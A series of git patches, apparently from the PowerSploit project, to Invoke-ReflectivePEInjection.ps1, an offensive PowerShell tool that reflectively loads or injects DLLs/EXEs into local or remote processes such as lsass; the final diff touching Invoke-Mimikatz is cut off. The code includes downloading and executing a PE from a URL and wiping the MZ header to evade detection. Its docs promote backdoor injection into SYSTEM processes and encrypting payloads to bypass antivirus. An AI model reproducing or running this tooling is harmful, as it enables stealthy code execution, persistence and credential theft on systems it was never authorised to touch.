From 17bfa4e2762e4c8c819b36503faca2c99ae816f3 Mon Sep 17 00:00:00 2001 From: Matt Graeber Date: Fri, 6 Nov 2015 13:31:58 -0500 Subject: Fixed a casting bug --- CodeExecution/Invoke-ReflectivePEInjection.ps1 | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) (limited to 'CodeExecution/Invoke-ReflectivePEInjection.ps1') diff --git a/CodeExecution/Invoke-ReflectivePEInjection.ps1 b/CodeExecution/Invoke-ReflectivePEInjection.ps1 index 4ca1b9d..b176d8a 100644 --- a/CodeExecution/Invoke-ReflectivePEInjection.ps1 +++ b/CodeExecution/Invoke-ReflectivePEInjection.ps1 @@ -2381,7 +2381,7 @@ $RemoteScriptBlock = { $PEInfo = Get-PEBasicInfo -PEBytes $PEBytes -Win32Types $Win32Types $OriginalImageBase = $PEInfo.OriginalImageBase $NXCompatible = $true - if (($PEInfo.DllCharacteristics -band $Win32Constants.IMAGE_DLLCHARACTERISTICS_NX_COMPAT) -ne $Win32Constants.IMAGE_DLLCHARACTERISTICS_NX_COMPAT) + if (([Int] $PEInfo.DllCharacteristics -band $Win32Constants.IMAGE_DLLCHARACTERISTICS_NX_COMPAT) -ne $Win32Constants.IMAGE_DLLCHARACTERISTICS_NX_COMPAT) { Write-Warning "PE is not compatible with DEP, might cause issues" -WarningAction Continue $NXCompatible = $false @@ -2440,7 +2440,7 @@ $RemoteScriptBlock = { #ASLR check [IntPtr]$LoadAddr = [IntPtr]::Zero - $PESupportsASLR = ($PEInfo.DllCharacteristics -band $Win32Constants.IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE) -eq $Win32Constants.IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE + $PESupportsASLR = ([Int] $PEInfo.DllCharacteristics -band $Win32Constants.IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE) -eq $Win32Constants.IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE if ((-not $ForceASLR) -and (-not $PESupportsASLR)) { Write-Warning "PE file being reflectively loaded is not ASLR compatible. If the loading fails, try restarting PowerShell and trying again OR try using the -ForceASLR flag (could cause crashes)" -WarningAction Continue -- cgit v1.2.3 From 0eb520e31f97bc0ca83bd2c1546a18dd97e09d79 Mon Sep 17 00:00:00 2001 From: Matt Graeber Date: Sat, 7 Nov 2015 20:25:29 -0500 Subject: Removed extraneous parameters Removed the following extraneous parameters: -PEPath -PEUrl -ComputerName The functionality they provided can be easily replicated in code outside of Invoke-ReflectivePEInjection. i.e. it should be up to the user how they might want to download a PE before loading it. That should not be dictated by Invoke-ReflectivePEInjection. --- CodeExecution/Invoke-ReflectivePEInjection.ps1 | 107 +++++-------------------- 1 file changed, 18 insertions(+), 89 deletions(-) (limited to 'CodeExecution/Invoke-ReflectivePEInjection.ps1') diff --git a/CodeExecution/Invoke-ReflectivePEInjection.ps1 b/CodeExecution/Invoke-ReflectivePEInjection.ps1 index b176d8a..238b9f6 100644 --- a/CodeExecution/Invoke-ReflectivePEInjection.ps1 +++ b/CodeExecution/Invoke-ReflectivePEInjection.ps1 @@ -7,14 +7,9 @@ This script has two modes. It can reflectively load a DLL/EXE in to the PowerShe or it can reflectively load a DLL in to a remote process. These modes have different parameters and constraints, please lead the Notes section (GENERAL NOTES) for information on how to use them. - 1.)Reflectively loads a DLL or EXE in to memory of the Powershell process. Because the DLL/EXE is loaded reflectively, it is not displayed when tools are used to list the DLLs of a running process. -This tool can be run on remote servers by supplying a local Windows PE file (DLL/EXE) to load in to memory on the remote system, -this will load and execute the DLL/EXE in to memory without writing any files to disk. - - 2.) Reflectively load a DLL in to memory of a remote process. As mentioned above, the DLL being reflectively loaded won't be displayed when tools are used to list DLLs of the running remote process. @@ -22,39 +17,21 @@ This is probably most useful for injecting backdoors in SYSTEM processes in Sess from the DLL. The script doesn't wait for the DLL to complete execution, and doesn't make any effort to cleanup memory in the remote process. - -While this script provides functionality to specify a file to load from disk a URL, or a byte array, these are more for demo purposes. The way I'd recommend using the script is to create a byte array -containing the file you'd like to reflectively load, and hardcode that byte array in to the script. One advantage of doing this is you can encrypt the byte array and decrypt it in memory, which will -bypass A/V. Another advantage is you won't be making web requests. The script can also load files from SQL Server and be used as a SQL Server backdoor. Please see the Casaba -blog linked below (thanks to whitey). - PowerSploit Function: Invoke-ReflectivePEInjection -Author: Joe Bialek, Twitter: @JosephBialek +Original author: Joe Bialek, Twitter: @JosephBialek +Code review and modifications: Matt Graeber, Twitter: @mattifestation License: BSD 3-Clause Required Dependencies: None Optional Dependencies: None -Version: 1.4 .DESCRIPTION Reflectively loads a Windows PE file (DLL/EXE) in to the powershell process, or reflectively injects a DLL in to a remote process. -.PARAMETER PEPath - -The path of the DLL/EXE to load and execute. This file must exist on the computer the script is being run on, not the remote computer. - -.PARAMETER PEUrl - -A URL containing a DLL/EXE to load and execute. - .PARAMETER PEBytes A byte array containing a DLL/EXE to load and execute. -.PARAMETER ComputerName - -Optional, an array of computernames to run the script on. - .PARAMETER FuncReturnType Optional, the return type of the function being called in the DLL. Default: Void @@ -78,43 +55,30 @@ Optional, the process ID of the remote process to inject the DLL in to. If not i Optional, will force the use of ASLR on the PE being loaded even if the PE indicates it doesn't support ASLR. Some PE's will work with ASLR even if the compiler flags don't indicate they support it. Other PE's will simply crash. Make sure to test this prior to using. Has no effect when loading in to a remote process. - -.EXAMPLE - -Load DemoDLL from a URL and run the exported function WStringFunc on the current system, print the wchar_t* returned by WStringFunc(). -Note that the file name on the website can be any file extension. -Invoke-ReflectivePEInjection -PEUrl http://yoursite.com/DemoDLL.dll -FuncReturnType WString - -.EXAMPLE - -Load DemoDLL and run the exported function WStringFunc on Target.local, print the wchar_t* returned by WStringFunc(). -Invoke-ReflectivePEInjection -PEPath DemoDLL.dll -FuncReturnType WString -ComputerName Target.local .EXAMPLE -Load DemoDLL and run the exported function WStringFunc on all computers in the file targetlist.txt. Print - the wchar_t* returned by WStringFunc() from all the computers. -Invoke-ReflectivePEInjection -PEPath DemoDLL.dll -FuncReturnType WString -ComputerName (Get-Content targetlist.txt) +Load DemoDLL and run the exported function WStringFunc, print the wchar_t* returned by WStringFunc(). +$PEBytes = [IO.File]::ReadAllBytes('C:\DemoDLL.dll') +$Result = Invoke-ReflectivePEInjection -PEBytes $PEBytes -FuncReturnType WString +Write-Output $Result .EXAMPLE Load DemoEXE and run it locally. -Invoke-ReflectivePEInjection -PEPath DemoEXE.exe -ExeArgs "Arg1 Arg2 Arg3 Arg4" +$PEBytes = [IO.File]::ReadAllBytes('C:\DemoEXE.exe') +Invoke-ReflectivePEInjection -PEBytes $PEBytes -ExeArgs "Arg1 Arg2 Arg3 Arg4" .EXAMPLE -Load DemoEXE and run it locally. Forces ASLR on for the EXE. -Invoke-ReflectivePEInjection -PEPath DemoEXE.exe -ExeArgs "Arg1 Arg2 Arg3 Arg4" -ForceASLR +$PEBytes = [IO.File]::ReadAllBytes('C:\DemoEXE.exe') +Invoke-ReflectivePEInjection -PEBytes $PEBytes -ExeArgs "Arg1 Arg2 Arg3 Arg4" -ForceASLR .EXAMPLE Refectively load DemoDLL_RemoteProcess.dll in to the lsass process on a remote computer. -Invoke-ReflectivePEInjection -PEPath DemoDLL_RemoteProcess.dll -ProcName lsass -ComputerName Target.Local - -.EXAMPLE - -Load a PE from a byte array. -Invoke-ReflectivePEInjection -PEPath (Get-Content c:\DemoEXE.exe -Encoding Byte) -ExeArgs "Arg1 Arg2 Arg3 Arg4" +$PEBytes = [IO.File]::ReadAllBytes('C:\DemoDLL_RemoteProcess.dll') +Invoke-ReflectivePEInjection -PEPath $PEBytes -ProcName lsass .NOTES GENERAL NOTES: @@ -134,8 +98,6 @@ The script has 3 basic sets of functionality: -Great for planting backdoor on a system by injecting backdoor DLL in to another processes memory. -Expects the DLL to have this function: void VoidFunc(). This is the function that will be called after the DLL is loaded. - - DLL LOADING NOTES: PowerShell does not capture an applications output if it is output using stdout, which is how Windows console apps output. @@ -182,50 +144,36 @@ Blog on using this script as a backdoor with SQL server: http://www.casaba.com/b #> -[CmdletBinding(DefaultParameterSetName="WebFile")] +[CmdletBinding()] Param( - [Parameter(ParameterSetName = "LocalFile", Position = 0, Mandatory = $true)] - [String] - $PEPath, - - [Parameter(ParameterSetName = "WebFile", Position = 0, Mandatory = $true)] - [Uri] - $PEUrl, - - [Parameter(ParameterSetName = "Bytes", Position = 0, Mandatory = $true)] + [Parameter(Position = 0, Mandatory = $true)] [ValidateNotNullOrEmpty()] [Byte[]] $PEBytes, [Parameter(Position = 1)] - [String[]] - $ComputerName, - - [Parameter(Position = 2)] [ValidateSet( 'WString', 'String', 'Void' )] [String] $FuncReturnType = 'Void', - [Parameter(Position = 3)] + [Parameter(Position = 2)] [String] $ExeArgs, - [Parameter(Position = 4)] + [Parameter(Position = 3)] [Int32] $ProcId, - [Parameter(Position = 5)] + [Parameter(Position = 4)] [String] $ProcName, - [Parameter(Position = 6)] [Switch] $ForceASLR ) Set-StrictMode -Version 2 - $RemoteScriptBlock = { [CmdletBinding()] Param( @@ -2900,18 +2848,6 @@ Function Main Write-Verbose "PowerShell ProcessID: $PID" - if ($PsCmdlet.ParameterSetName -ieq "LocalFile") - { - Get-ChildItem $PEPath -ErrorAction Stop | Out-Null - [Byte[]]$PEBytes = [System.IO.File]::ReadAllBytes((Resolve-Path $PEPath)) - } - elseif ($PsCmdlet.ParameterSetName -ieq "WebFile") - { - $WebClient = New-Object System.Net.WebClient - - [Byte[]]$PEBytes = $WebClient.DownloadData($PEUrl) - } - #Verify the image is a valid PE file $e_magic = ($PEBytes[0..1] | % {[Char] $_}) -join '' @@ -2935,14 +2871,7 @@ Function Main $ExeArgs = "ReflectiveExe" } - if ($ComputerName -eq $null -or $ComputerName -imatch "^\s*$") - { - Invoke-Command -ScriptBlock $RemoteScriptBlock -ArgumentList @($PEBytes, $FuncReturnType, $ProcId, $ProcName,$ForceASLR) - } - else - { - Invoke-Command -ScriptBlock $RemoteScriptBlock -ArgumentList @($PEBytes, $FuncReturnType, $ProcId, $ProcName,$ForceASLR) -ComputerName $ComputerName - } + Invoke-Command -ScriptBlock $RemoteScriptBlock -ArgumentList @($PEBytes, $FuncReturnType, $ProcId, $ProcName,$ForceASLR) } Main -- cgit v1.2.3 From b8e831e4f9650169371fafc24352b8cdd7e65932 Mon Sep 17 00:00:00 2001 From: Matt Graeber Date: Sat, 7 Nov 2015 19:50:05 -0800 Subject: Revert "Removed extraneous parameters" This reverts commit 0eb520e31f97bc0ca83bd2c1546a18dd97e09d79. --- CodeExecution/Invoke-ReflectivePEInjection.ps1 | 107 ++++++++++++++++++++----- 1 file changed, 89 insertions(+), 18 deletions(-) (limited to 'CodeExecution/Invoke-ReflectivePEInjection.ps1') diff --git a/CodeExecution/Invoke-ReflectivePEInjection.ps1 b/CodeExecution/Invoke-ReflectivePEInjection.ps1 index 238b9f6..b176d8a 100644 --- a/CodeExecution/Invoke-ReflectivePEInjection.ps1 +++ b/CodeExecution/Invoke-ReflectivePEInjection.ps1 @@ -7,9 +7,14 @@ This script has two modes. It can reflectively load a DLL/EXE in to the PowerShe or it can reflectively load a DLL in to a remote process. These modes have different parameters and constraints, please lead the Notes section (GENERAL NOTES) for information on how to use them. + 1.)Reflectively loads a DLL or EXE in to memory of the Powershell process. Because the DLL/EXE is loaded reflectively, it is not displayed when tools are used to list the DLLs of a running process. +This tool can be run on remote servers by supplying a local Windows PE file (DLL/EXE) to load in to memory on the remote system, +this will load and execute the DLL/EXE in to memory without writing any files to disk. + + 2.) Reflectively load a DLL in to memory of a remote process. As mentioned above, the DLL being reflectively loaded won't be displayed when tools are used to list DLLs of the running remote process. @@ -17,21 +22,39 @@ This is probably most useful for injecting backdoors in SYSTEM processes in Sess from the DLL. The script doesn't wait for the DLL to complete execution, and doesn't make any effort to cleanup memory in the remote process. + +While this script provides functionality to specify a file to load from disk a URL, or a byte array, these are more for demo purposes. The way I'd recommend using the script is to create a byte array +containing the file you'd like to reflectively load, and hardcode that byte array in to the script. One advantage of doing this is you can encrypt the byte array and decrypt it in memory, which will +bypass A/V. Another advantage is you won't be making web requests. The script can also load files from SQL Server and be used as a SQL Server backdoor. Please see the Casaba +blog linked below (thanks to whitey). + PowerSploit Function: Invoke-ReflectivePEInjection -Original author: Joe Bialek, Twitter: @JosephBialek -Code review and modifications: Matt Graeber, Twitter: @mattifestation +Author: Joe Bialek, Twitter: @JosephBialek License: BSD 3-Clause Required Dependencies: None Optional Dependencies: None +Version: 1.4 .DESCRIPTION Reflectively loads a Windows PE file (DLL/EXE) in to the powershell process, or reflectively injects a DLL in to a remote process. +.PARAMETER PEPath + +The path of the DLL/EXE to load and execute. This file must exist on the computer the script is being run on, not the remote computer. + +.PARAMETER PEUrl + +A URL containing a DLL/EXE to load and execute. + .PARAMETER PEBytes A byte array containing a DLL/EXE to load and execute. +.PARAMETER ComputerName + +Optional, an array of computernames to run the script on. + .PARAMETER FuncReturnType Optional, the return type of the function being called in the DLL. Default: Void @@ -55,30 +78,43 @@ Optional, the process ID of the remote process to inject the DLL in to. If not i Optional, will force the use of ASLR on the PE being loaded even if the PE indicates it doesn't support ASLR. Some PE's will work with ASLR even if the compiler flags don't indicate they support it. Other PE's will simply crash. Make sure to test this prior to using. Has no effect when loading in to a remote process. + +.EXAMPLE + +Load DemoDLL from a URL and run the exported function WStringFunc on the current system, print the wchar_t* returned by WStringFunc(). +Note that the file name on the website can be any file extension. +Invoke-ReflectivePEInjection -PEUrl http://yoursite.com/DemoDLL.dll -FuncReturnType WString + +.EXAMPLE + +Load DemoDLL and run the exported function WStringFunc on Target.local, print the wchar_t* returned by WStringFunc(). +Invoke-ReflectivePEInjection -PEPath DemoDLL.dll -FuncReturnType WString -ComputerName Target.local .EXAMPLE -Load DemoDLL and run the exported function WStringFunc, print the wchar_t* returned by WStringFunc(). -$PEBytes = [IO.File]::ReadAllBytes('C:\DemoDLL.dll') -$Result = Invoke-ReflectivePEInjection -PEBytes $PEBytes -FuncReturnType WString -Write-Output $Result +Load DemoDLL and run the exported function WStringFunc on all computers in the file targetlist.txt. Print + the wchar_t* returned by WStringFunc() from all the computers. +Invoke-ReflectivePEInjection -PEPath DemoDLL.dll -FuncReturnType WString -ComputerName (Get-Content targetlist.txt) .EXAMPLE Load DemoEXE and run it locally. -$PEBytes = [IO.File]::ReadAllBytes('C:\DemoEXE.exe') -Invoke-ReflectivePEInjection -PEBytes $PEBytes -ExeArgs "Arg1 Arg2 Arg3 Arg4" +Invoke-ReflectivePEInjection -PEPath DemoEXE.exe -ExeArgs "Arg1 Arg2 Arg3 Arg4" .EXAMPLE -$PEBytes = [IO.File]::ReadAllBytes('C:\DemoEXE.exe') -Invoke-ReflectivePEInjection -PEBytes $PEBytes -ExeArgs "Arg1 Arg2 Arg3 Arg4" -ForceASLR +Load DemoEXE and run it locally. Forces ASLR on for the EXE. +Invoke-ReflectivePEInjection -PEPath DemoEXE.exe -ExeArgs "Arg1 Arg2 Arg3 Arg4" -ForceASLR .EXAMPLE Refectively load DemoDLL_RemoteProcess.dll in to the lsass process on a remote computer. -$PEBytes = [IO.File]::ReadAllBytes('C:\DemoDLL_RemoteProcess.dll') -Invoke-ReflectivePEInjection -PEPath $PEBytes -ProcName lsass +Invoke-ReflectivePEInjection -PEPath DemoDLL_RemoteProcess.dll -ProcName lsass -ComputerName Target.Local + +.EXAMPLE + +Load a PE from a byte array. +Invoke-ReflectivePEInjection -PEPath (Get-Content c:\DemoEXE.exe -Encoding Byte) -ExeArgs "Arg1 Arg2 Arg3 Arg4" .NOTES GENERAL NOTES: @@ -98,6 +134,8 @@ The script has 3 basic sets of functionality: -Great for planting backdoor on a system by injecting backdoor DLL in to another processes memory. -Expects the DLL to have this function: void VoidFunc(). This is the function that will be called after the DLL is loaded. + + DLL LOADING NOTES: PowerShell does not capture an applications output if it is output using stdout, which is how Windows console apps output. @@ -144,36 +182,50 @@ Blog on using this script as a backdoor with SQL server: http://www.casaba.com/b #> -[CmdletBinding()] +[CmdletBinding(DefaultParameterSetName="WebFile")] Param( - [Parameter(Position = 0, Mandatory = $true)] + [Parameter(ParameterSetName = "LocalFile", Position = 0, Mandatory = $true)] + [String] + $PEPath, + + [Parameter(ParameterSetName = "WebFile", Position = 0, Mandatory = $true)] + [Uri] + $PEUrl, + + [Parameter(ParameterSetName = "Bytes", Position = 0, Mandatory = $true)] [ValidateNotNullOrEmpty()] [Byte[]] $PEBytes, [Parameter(Position = 1)] + [String[]] + $ComputerName, + + [Parameter(Position = 2)] [ValidateSet( 'WString', 'String', 'Void' )] [String] $FuncReturnType = 'Void', - [Parameter(Position = 2)] + [Parameter(Position = 3)] [String] $ExeArgs, - [Parameter(Position = 3)] + [Parameter(Position = 4)] [Int32] $ProcId, - [Parameter(Position = 4)] + [Parameter(Position = 5)] [String] $ProcName, + [Parameter(Position = 6)] [Switch] $ForceASLR ) Set-StrictMode -Version 2 + $RemoteScriptBlock = { [CmdletBinding()] Param( @@ -2848,6 +2900,18 @@ Function Main Write-Verbose "PowerShell ProcessID: $PID" + if ($PsCmdlet.ParameterSetName -ieq "LocalFile") + { + Get-ChildItem $PEPath -ErrorAction Stop | Out-Null + [Byte[]]$PEBytes = [System.IO.File]::ReadAllBytes((Resolve-Path $PEPath)) + } + elseif ($PsCmdlet.ParameterSetName -ieq "WebFile") + { + $WebClient = New-Object System.Net.WebClient + + [Byte[]]$PEBytes = $WebClient.DownloadData($PEUrl) + } + #Verify the image is a valid PE file $e_magic = ($PEBytes[0..1] | % {[Char] $_}) -join '' @@ -2871,7 +2935,14 @@ Function Main $ExeArgs = "ReflectiveExe" } - Invoke-Command -ScriptBlock $RemoteScriptBlock -ArgumentList @($PEBytes, $FuncReturnType, $ProcId, $ProcName,$ForceASLR) + if ($ComputerName -eq $null -or $ComputerName -imatch "^\s*$") + { + Invoke-Command -ScriptBlock $RemoteScriptBlock -ArgumentList @($PEBytes, $FuncReturnType, $ProcId, $ProcName,$ForceASLR) + } + else + { + Invoke-Command -ScriptBlock $RemoteScriptBlock -ArgumentList @($PEBytes, $FuncReturnType, $ProcId, $ProcName,$ForceASLR) -ComputerName $ComputerName + } } Main -- cgit v1.2.3 From 992f9800229d58158a4094f8ab4a92e0473fef34 Mon Sep 17 00:00:00 2001 From: Matt Graeber Date: Sat, 7 Nov 2015 20:00:22 -0800 Subject: Removed extraneous parameters Removed extraneous parameters Removed the following extraneous parameters: -PEPath -PEUrl The functionality they provided can be easily replicated in code outside of Invoke-ReflectivePEInjection. i.e. it should be up to the user how they might want to download a PE before loading it. That should not be dictated by Invoke-ReflectivePEInjection. --- CodeExecution/Invoke-ReflectivePEInjection.ps1 | 71 +++++--------------------- 1 file changed, 13 insertions(+), 58 deletions(-) (limited to 'CodeExecution/Invoke-ReflectivePEInjection.ps1') diff --git a/CodeExecution/Invoke-ReflectivePEInjection.ps1 b/CodeExecution/Invoke-ReflectivePEInjection.ps1 index b176d8a..503ea7f 100644 --- a/CodeExecution/Invoke-ReflectivePEInjection.ps1 +++ b/CodeExecution/Invoke-ReflectivePEInjection.ps1 @@ -7,14 +7,12 @@ This script has two modes. It can reflectively load a DLL/EXE in to the PowerShe or it can reflectively load a DLL in to a remote process. These modes have different parameters and constraints, please lead the Notes section (GENERAL NOTES) for information on how to use them. - 1.)Reflectively loads a DLL or EXE in to memory of the Powershell process. Because the DLL/EXE is loaded reflectively, it is not displayed when tools are used to list the DLLs of a running process. This tool can be run on remote servers by supplying a local Windows PE file (DLL/EXE) to load in to memory on the remote system, this will load and execute the DLL/EXE in to memory without writing any files to disk. - 2.) Reflectively load a DLL in to memory of a remote process. As mentioned above, the DLL being reflectively loaded won't be displayed when tools are used to list DLLs of the running remote process. @@ -22,31 +20,17 @@ This is probably most useful for injecting backdoors in SYSTEM processes in Sess from the DLL. The script doesn't wait for the DLL to complete execution, and doesn't make any effort to cleanup memory in the remote process. - -While this script provides functionality to specify a file to load from disk a URL, or a byte array, these are more for demo purposes. The way I'd recommend using the script is to create a byte array -containing the file you'd like to reflectively load, and hardcode that byte array in to the script. One advantage of doing this is you can encrypt the byte array and decrypt it in memory, which will -bypass A/V. Another advantage is you won't be making web requests. The script can also load files from SQL Server and be used as a SQL Server backdoor. Please see the Casaba -blog linked below (thanks to whitey). - PowerSploit Function: Invoke-ReflectivePEInjection Author: Joe Bialek, Twitter: @JosephBialek +Code review and modifications: Matt Graeber, Twitter: @mattifestation License: BSD 3-Clause Required Dependencies: None Optional Dependencies: None -Version: 1.4 .DESCRIPTION Reflectively loads a Windows PE file (DLL/EXE) in to the powershell process, or reflectively injects a DLL in to a remote process. -.PARAMETER PEPath - -The path of the DLL/EXE to load and execute. This file must exist on the computer the script is being run on, not the remote computer. - -.PARAMETER PEUrl - -A URL containing a DLL/EXE to load and execute. - .PARAMETER PEBytes A byte array containing a DLL/EXE to load and execute. @@ -81,40 +65,34 @@ Optional, will force the use of ASLR on the PE being loaded even if the PE indic .EXAMPLE -Load DemoDLL from a URL and run the exported function WStringFunc on the current system, print the wchar_t* returned by WStringFunc(). -Note that the file name on the website can be any file extension. -Invoke-ReflectivePEInjection -PEUrl http://yoursite.com/DemoDLL.dll -FuncReturnType WString - -.EXAMPLE - Load DemoDLL and run the exported function WStringFunc on Target.local, print the wchar_t* returned by WStringFunc(). -Invoke-ReflectivePEInjection -PEPath DemoDLL.dll -FuncReturnType WString -ComputerName Target.local +$PEBytes = [IO.File]::ReadAllBytes('DemoDLL.dll') +Invoke-ReflectivePEInjection -PEBytes $PEBytes -FuncReturnType WString -ComputerName Target.local .EXAMPLE Load DemoDLL and run the exported function WStringFunc on all computers in the file targetlist.txt. Print the wchar_t* returned by WStringFunc() from all the computers. -Invoke-ReflectivePEInjection -PEPath DemoDLL.dll -FuncReturnType WString -ComputerName (Get-Content targetlist.txt) +$PEBytes = [IO.File]::ReadAllBytes('DemoDLL.dll') +Invoke-ReflectivePEInjection -PEBytes $PEBytes -FuncReturnType WString -ComputerName (Get-Content targetlist.txt) .EXAMPLE Load DemoEXE and run it locally. -Invoke-ReflectivePEInjection -PEPath DemoEXE.exe -ExeArgs "Arg1 Arg2 Arg3 Arg4" +$PEBytes = [IO.File]::ReadAllBytes('DemoEXE.exe') +Invoke-ReflectivePEInjection -PEBytes $PEBytes -ExeArgs "Arg1 Arg2 Arg3 Arg4" .EXAMPLE Load DemoEXE and run it locally. Forces ASLR on for the EXE. -Invoke-ReflectivePEInjection -PEPath DemoEXE.exe -ExeArgs "Arg1 Arg2 Arg3 Arg4" -ForceASLR +$PEBytes = [IO.File]::ReadAllBytes('DemoEXE.exe') +Invoke-ReflectivePEInjection -PEBytes $PEBytes -ExeArgs "Arg1 Arg2 Arg3 Arg4" -ForceASLR .EXAMPLE Refectively load DemoDLL_RemoteProcess.dll in to the lsass process on a remote computer. -Invoke-ReflectivePEInjection -PEPath DemoDLL_RemoteProcess.dll -ProcName lsass -ComputerName Target.Local - -.EXAMPLE - -Load a PE from a byte array. -Invoke-ReflectivePEInjection -PEPath (Get-Content c:\DemoEXE.exe -Encoding Byte) -ExeArgs "Arg1 Arg2 Arg3 Arg4" +$PEBytes = [IO.File]::ReadAllBytes('DemoDLL_RemoteProcess.dll') +Invoke-ReflectivePEInjection -PEBytes $PEBytes -ProcName lsass -ComputerName Target.Local .NOTES GENERAL NOTES: @@ -134,8 +112,6 @@ The script has 3 basic sets of functionality: -Great for planting backdoor on a system by injecting backdoor DLL in to another processes memory. -Expects the DLL to have this function: void VoidFunc(). This is the function that will be called after the DLL is loaded. - - DLL LOADING NOTES: PowerShell does not capture an applications output if it is output using stdout, which is how Windows console apps output. @@ -182,17 +158,9 @@ Blog on using this script as a backdoor with SQL server: http://www.casaba.com/b #> -[CmdletBinding(DefaultParameterSetName="WebFile")] +[CmdletBinding()] Param( - [Parameter(ParameterSetName = "LocalFile", Position = 0, Mandatory = $true)] - [String] - $PEPath, - - [Parameter(ParameterSetName = "WebFile", Position = 0, Mandatory = $true)] - [Uri] - $PEUrl, - - [Parameter(ParameterSetName = "Bytes", Position = 0, Mandatory = $true)] + [Parameter(Position = 0, Mandatory = $true)] [ValidateNotNullOrEmpty()] [Byte[]] $PEBytes, @@ -218,7 +186,6 @@ Param( [String] $ProcName, - [Parameter(Position = 6)] [Switch] $ForceASLR ) @@ -2900,18 +2867,6 @@ Function Main Write-Verbose "PowerShell ProcessID: $PID" - if ($PsCmdlet.ParameterSetName -ieq "LocalFile") - { - Get-ChildItem $PEPath -ErrorAction Stop | Out-Null - [Byte[]]$PEBytes = [System.IO.File]::ReadAllBytes((Resolve-Path $PEPath)) - } - elseif ($PsCmdlet.ParameterSetName -ieq "WebFile") - { - $WebClient = New-Object System.Net.WebClient - - [Byte[]]$PEBytes = $WebClient.DownloadData($PEUrl) - } - #Verify the image is a valid PE file $e_magic = ($PEBytes[0..1] | % {[Char] $_}) -join '' -- cgit v1.2.3 From aae81ddfe554abb75c9dd9f1bab5474cfe41c6e7 Mon Sep 17 00:00:00 2001 From: Matt Graeber Date: Sat, 7 Nov 2015 20:26:08 -0800 Subject: Adding -DoNotZeroMZ for testing --- CodeExecution/Invoke-ReflectivePEInjection.ps1 | 19 ++++++++++++++----- 1 file changed, 14 insertions(+), 5 deletions(-) (limited to 'CodeExecution/Invoke-ReflectivePEInjection.ps1') diff --git a/CodeExecution/Invoke-ReflectivePEInjection.ps1 b/CodeExecution/Invoke-ReflectivePEInjection.ps1 index 503ea7f..8f4533e 100644 --- a/CodeExecution/Invoke-ReflectivePEInjection.ps1 +++ b/CodeExecution/Invoke-ReflectivePEInjection.ps1 @@ -62,6 +62,10 @@ Optional, the process ID of the remote process to inject the DLL in to. If not i Optional, will force the use of ASLR on the PE being loaded even if the PE indicates it doesn't support ASLR. Some PE's will work with ASLR even if the compiler flags don't indicate they support it. Other PE's will simply crash. Make sure to test this prior to using. Has no effect when loading in to a remote process. + +.PARAMETER DoNotZeroMZ + +Optional, will not wipe the MZ from the first two bytes of the PE. This is to be used primarily for testing purposes and to enable loading the same PE with Invoke-ReflectivePEInjection more than once. .EXAMPLE @@ -187,7 +191,10 @@ Param( $ProcName, [Switch] - $ForceASLR + $ForceASLR, + + [Switch] + $DoNotZeroMZ ) Set-StrictMode -Version 2 @@ -2875,10 +2882,12 @@ Function Main throw 'PE is not a valid PE file.' } - # Remove 'MZ' from the PE file so that it cannot be detected by .imgscan in WinDbg - # TODO: Investigate how much of the header can be destroyed, I'd imagine most of it can be. - $PEBytes[0] = 0 - $PEBytes[1] = 0 + if (-not $DoNotZeroMZ) { + # Remove 'MZ' from the PE file so that it cannot be detected by .imgscan in WinDbg + # TODO: Investigate how much of the header can be destroyed, I'd imagine most of it can be. + $PEBytes[0] = 0 + $PEBytes[1] = 0 + } #Add a "program name" to exeargs, just so the string looks as normal as possible (real args start indexing at 1) if ($ExeArgs -ne $null -and $ExeArgs -ne '') -- cgit v1.2.3 From ce3b21685ad74e302cefb39c07bfba9e0e178d9b Mon Sep 17 00:00:00 2001 From: Matt Graeber Date: Mon, 14 Dec 2015 16:40:04 -0800 Subject: Bugfix #92: perform OS check when importing NtCreateThreadEx --- CodeExecution/Invoke-ReflectivePEInjection.ps1 | 11 +++++++---- Exfiltration/Invoke-Mimikatz.ps1 | 11 +++++++---- 2 files changed, 14 insertions(+), 8 deletions(-) (limited to 'CodeExecution/Invoke-ReflectivePEInjection.ps1') diff --git a/CodeExecution/Invoke-ReflectivePEInjection.ps1 b/CodeExecution/Invoke-ReflectivePEInjection.ps1 index 8f4533e..d164493 100644 --- a/CodeExecution/Invoke-ReflectivePEInjection.ps1 +++ b/CodeExecution/Invoke-ReflectivePEInjection.ps1 @@ -710,10 +710,13 @@ $RemoteScriptBlock = { $ImpersonateSelf = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ImpersonateSelfAddr, $ImpersonateSelfDelegate) $Win32Functions | Add-Member -MemberType NoteProperty -Name ImpersonateSelf -Value $ImpersonateSelf - $NtCreateThreadExAddr = Get-ProcAddress NtDll.dll NtCreateThreadEx - $NtCreateThreadExDelegate = Get-DelegateType @([IntPtr].MakeByRefType(), [UInt32], [IntPtr], [IntPtr], [IntPtr], [IntPtr], [Bool], [UInt32], [UInt32], [UInt32], [IntPtr]) ([UInt32]) - $NtCreateThreadEx = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($NtCreateThreadExAddr, $NtCreateThreadExDelegate) - $Win32Functions | Add-Member -MemberType NoteProperty -Name NtCreateThreadEx -Value $NtCreateThreadEx + # NtCreateThreadEx is only ever called on Vista and Win7. NtCreateThreadEx is not exported by ntdll.dll in Windows XP + if (([Environment]::OSVersion.Version -ge (New-Object 'Version' 6,0)) -and ([Environment]::OSVersion.Version -lt (New-Object 'Version' 6,2))) { + $NtCreateThreadExAddr = Get-ProcAddress NtDll.dll NtCreateThreadEx + $NtCreateThreadExDelegate = Get-DelegateType @([IntPtr].MakeByRefType(), [UInt32], [IntPtr], [IntPtr], [IntPtr], [IntPtr], [Bool], [UInt32], [UInt32], [UInt32], [IntPtr]) ([UInt32]) + $NtCreateThreadEx = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($NtCreateThreadExAddr, $NtCreateThreadExDelegate) + $Win32Functions | Add-Member -MemberType NoteProperty -Name NtCreateThreadEx -Value $NtCreateThreadEx + } $IsWow64ProcessAddr = Get-ProcAddress Kernel32.dll IsWow64Process $IsWow64ProcessDelegate = Get-DelegateType @([IntPtr], [Bool].MakeByRefType()) ([Bool]) diff --git a/Exfiltration/Invoke-Mimikatz.ps1 b/Exfiltration/Invoke-Mimikatz.ps1 index fc8365b..835d7a7 100644 --- a/Exfiltration/Invoke-Mimikatz.ps1 +++ 